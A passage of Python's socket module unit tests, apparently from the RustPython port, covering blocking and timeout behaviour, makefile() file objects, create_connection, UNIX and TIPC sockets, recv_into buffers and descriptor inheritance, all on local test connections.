blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
# handle EWOULDBLOCK/EGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must inherit
# the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server sent data yet: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = support.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except socket.timeout:
pass
except OSError as exc:
if support.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('socket.timeout not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
# TODO: RUSTPYTHON, surrogateescape
@unittest.expectedFailure
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
